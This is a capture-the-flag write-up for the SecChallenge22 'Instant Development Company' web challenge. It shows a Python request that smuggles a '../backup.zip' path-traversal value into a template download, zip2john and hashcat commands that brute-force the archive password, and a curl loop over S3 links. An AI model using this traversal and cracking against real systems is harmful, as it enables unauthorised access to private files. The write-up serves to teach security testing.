---
layout: post
title: Instant Development Company
description: Red herring city
tags: web secchallenge22
permalink: /sc22/web/instant
hidden: 1
---

## Description

Your uncle got scammed but he's too embarrassed to tell you how much he had lost. Can you find out?

[https://instant-development-company.secchallenge.crysys.hu](https://instant-development-company.secchallenge.crysys.hu)

- Author: Andrix

## Solution

Opening up the site we aren't presented with too many options, so we head to the `/review` endpoint through the link on the main page. Its vulnerable to XSS but other than that, I could not find anything interesting.
I decided to go back to the roots, and started running `dirbuster` on the site, and it quickly found a hidden endpoint: `/debug`.

On there we have bunch of options, but downloading source seems like a good place to start.
After acquiring the source files we are presented with:
```
announce.html
base.html
debug.html
index.html
reviews.html
```

Reading through the files, we can see some comments inside the `debug.html` file, which indicate, that a `backup.zip` file with an easy to break password is accessible from the webroot. We can download the mentioned file using a small python script:
```python
import requests

r = requests.post("https://instant-development-company.secchallenge.crysys.hu/download/templates", data = {'template': '../backup.zip'}, verify = False)
with open('backup.zip', 'wb') as f:
	f.write(r.content)
```

From here we are required to crack the password. To do this, we first extract the password hash, then we can use hashcat to crack it.
```bash
zip2john backup.zip > backup.hash
# remove unnecessary content from backup.hash
# or else hashcat will throw errors

# -a brute -m hashtype = PKZIP (Compressed Multi-File) file format
hashcat -a 3 -m 17220 backup.hash ?d?d?d?d?d?d?d?d?d?d
```

Once hashcat crunched all the possibilities, we can unzip the previously extracted zipfile. It contains two files:
```
README.txt
contracts.txt
```

The `README` contains some sort of clue/meme, but the `contracts.txt` is the file we are looking for. It contains a bunch of, already expired S3 links.

At this point I got lucky, and solved the challenge by accident using python (I realized if I use curl, the links remain accessible, and I can read the contents, probably due to some AWS missconfiguration):
```python
import os

with open("contracts.txt", 'r') as f:
	for line in f.readlines():
		r = os.system(f'curl {line}')
```

After the solve, I contacted Andrix, who gave the explaination:
If you forgo the parameters given to the http request (the stuff after the `?` in the URL) you can abuse the AWS S3 missconfiguration.

The acquired flag is:
```
cd22{HIDDEN}
```

[&#8592; Back to SecChallenge22](/sc22)
